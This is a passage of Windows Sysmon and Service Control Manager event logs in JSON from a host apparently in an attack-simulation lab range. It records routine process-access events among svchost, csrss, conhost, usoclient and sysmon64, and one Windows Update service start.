C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4558,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4559,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4560,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-0010903C0600}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-0010903C0600}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4561,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.208\r\nSourceProcessGUID: {E2A3D6B1-1188-5F25-0000-0010903C0600}\r\nSourceProcessId: 2520\r\nSourceThreadId: 744\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-00100F3C0600}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.208","SourceProcessGUID":"{E2A3D6B1-1188-5F25-0000-0010903C0600}","SourceProcessId":"2520","SourceThreadId":"744","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-00100F3C0600}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4562,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-00100F3C0600}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-00100F3C0600}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76860,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the running state.","param1":"Update Orchestrator Service for Windows Update","param2":"running","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4563,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.302\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2276\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-00100F3C0600}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\usocore.dll+21062|c:\\windows\\system32\\usocore.dll+158b4|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.302","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2276","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-00100F3C0600}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\usocore.dll+21062|c:\\windows\\system32\\usocore.dll+158b4|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4564,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.333\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.333","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4565,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.333\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 